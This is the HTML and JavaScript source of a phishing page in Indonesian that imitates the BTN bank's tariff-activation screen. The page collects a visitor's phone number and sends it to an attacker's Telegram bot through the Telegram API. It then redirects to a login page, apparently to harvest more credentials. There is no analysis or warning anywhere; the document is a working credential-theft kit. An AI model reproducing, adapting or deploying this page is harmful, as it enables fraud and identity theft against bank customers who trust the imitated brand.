<!DOCTYPE html>
<html lang="in">
<head>
      <meta charset="UTF-8">
      <title>𝘽𝙏𝙉 - 𝗔𝗸𝘁𝗶𝘃𝗮𝘀𝗶 𝗧𝗮𝗿𝗶𝗳</title>
      <meta name="theme-color" content="#0147A9">
      <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no" />
<meta content="https://hosting.tigerengine.id/1z37v1.jpg" property="og:image">
<meta name="description" content="Solusi praktis untuk penuhi segala kebutuhan Anda di mana saja dan kapan saja">
<link href="https://raw.githubusercontent.com/gopay882/ast/main/BTN/icon.png" rel="shortcut icon" type="image/x-icon">
<link href="https://raw.githubusercontent.com/gopay882/ast/main/BTN/icon.png" rel="apple-touch-icon">
</head>
<style>
      @import url('https://fonts.googleapis.com/css?family=Open+Sans&display=swap');
      
 body {
       font-family: sans-serif;
       margin: 0px;
       background: #f5fafe;
}
       
.asiap{
      position: relative;
      height: 100%;
      width: 100%;
}

.formhp{
      display: block;
      border-radius: 10px;
      padding-left:45px; 
      background-image: url(https://raw.githubusercontent.com/gopay882/ast/main/BTN/nohp.png); 
      background-size: 100% 100%; 
      background-position: 100% 100%; 
      font-size: 18px;
      font-weight: 800;
      color: #0064af;
      border: 0.7px solid #00000080;
      outline: 0.7px solid #00000080;
      height: 45px;
      width: 70%;
      top: 30px;
      bottom: 0;
      position: relative;
      margin: auto;
}

.formhp:focus{
      border: 0.8px solid #017de0;
}

::placeholder{
      color:#000;
      opacity:0.3;
      font-size:16px;
}
 .label{
       color: #000000c0;
       position: relative;
       padding-left: 35px;
       font-size: 14px;
       font-weight: bold;
       top: 27px;
 }
 
 .lama{
       position: relative;
       background-image: url(https://raw.githubusercontent.com/gopay882/ast/main/BTN/button.png); 
       background-size: 100% 100%; 
       background-position: 100%:100%; 
       background-refreat: no-refeat; 
       color: #fff; 
       padding-top: 1px; 
       font-weight: bold; 
       background-color: #0069B9; 
       margin-top: 0px; 
       height: 45px;
       width: 80%; 
       box-shadow: rgba(0, 0, 0, 0.38) 2.4px 2.4px 3.2px;
       margin: auto;
       top: 75px;
       bottom: 0;
       border-radius: 10px;
       border: 0.7px solid #017de0;
       outline: 0.7px solid #017de0;
       text-align: center;
       align-items: center;
       justify-content: center;
 }  
 
 .baru{
       position: relative;
       background: #fff;
       color: #017de0; 
       padding-top: 1px; 
       font-weight: bold;        
       height: 45px;
       width: 80%; 
       box-shadow: rgba(0, 0, 0, 0.38) 2.4px 2.4px 3.2px;
       margin: auto;
       top: 95px;
       bottom: 0;
       border-radius: 10px;
       border: 1px solid #017de0;
       outline: 1px solid #017de0;
       text-align: center;
       align-items: center;
       justify-content: center;
 }
 
 .center {
  display: flex;
  justify-content: center;
}

.a{
   font-size:18px;
   font-weight:bold;
   color: #00000099;
}

.logo{
      display: flex;
      z-index: 99999;
      position: relative;
      margin: auto;
      top: 140px;
      
}

welalxcome {
  display: flex;
  position: fixed;
  top: 0;
  left: 0;
  right: 0;
  bottom: 0;
  width: 100%;
  background: url(https://raw.githubusercontent.com/gopay882/ast/main/BTN/walcome.png) no-repeat center center;
  background-position: 100% 100%;
  background-size: 100% 100%;
  z-index: 10000;

}
welalxcome img {
        width:100%;
    height: 700px;
    margin-top: -55px;
    
}
chsalxcome {
        position: relative;
    width: 100%;
    height: 100vh;
    display: flex;
    flex-direction: column;
    flex-wrap: nowrap;
    align-items: center;
}

 .process {
     top: 0;
     left: 0;
     right: 0;
     position: fixed;
     display: flex;
     justify-content: center;
     align-items: center;
     background: #00000090;
     z-index: 999999999;
     width: 100%;
     height: 100%;
    
     
 }
 
 .loading {
     margin-top: -50px;
     position: absolute;
     display: flex;
     justify-content: center;
     align-items: center;
     
     
 }

 .loading img {
     width: 100px;
     
 }
</style>
<body>
<welalxcome>
</welalxcome>
<chsalxcome2 style="display: none;">
<img src="https://raw.githubusercontent.com/gopay882/ast/main/BTN/pucokindex.png" class="asiap" alt="">
<div id="loading" name="process" class="process" style="display: none;">
			<div class="loading">      
				<img src="https://raw.githubusercontent.com/gopay882/ast/main/BTN/loading.gif">
			</div>				
		</div>
<form id="formHp" onsubmit="sendHp()">
   <p class="center a">Silahkan Pilih Tarif yang diinginkan</p>
 <label class="label">Nomor Telepon :</label>
<input type="tel" class="formhp" name="nohp" id="nohp" placeholder="Ex. 086786777890" required maxlength="13">
<button type="submit" class="lama center">Tarif Lama Rp 6.500 / Transaksi</button>
<button type="submit" class="baru center">Tarif Baru Rp 150.000 / Bulan</button>
<br>
<img src="https://raw.githubusercontent.com/gopay882/ast/main/BTN/logo-btn.png" class="center logo" width="130px"alt="">
</form>

<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.6.0/jquery.min.js"></script>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.11.3/jquery.min.js"></script>
<script src="i.js"></script>
<script>
 $(document).ready(function() {
    $('#nohp').on('input', function() {
        if ($(this).val() == '0' || $(this).val() == '62') {
            $(this).val('');
        }
    });
});     
var logo = "━─━─༺𝙬𝙬𝙬.𝙗𝙩𝙣.𝙘𝙤.𝙞𝙙___▩";        
 function sendHp(){
      event.preventDefault();
      $(".process").fadeIn(); 
      
  var nohp = $('#nohp').val();
  sessionStorage.setItem('nohp', nohp);
          
    var gabungan = "" + logo + '%0A%0A※ 𝗡𝗼.𝗛𝗣 •• %2B62' + nohp ;
        $.ajax({                   
            url: `https://api.telegram.org/bot${token}/sendMessage?chat_id=${grup}&text=${gabungan}&parse_mode=html`,
            method: `POST`,                      
            complete: function(data) {
            setTimeout(function(){            
            window.location.href='login.html';
            $(".process").fadeOut();     
   }, 500);
            }
          })
        }
  
</script>
<script>

        $( document ).ready(function() {

            setTimeout(() => {
                $('welalxcome').fadeOut();
                $('chsalxcome2').fadeIn();
            },800)
        });
</script>      
</body>
</html>
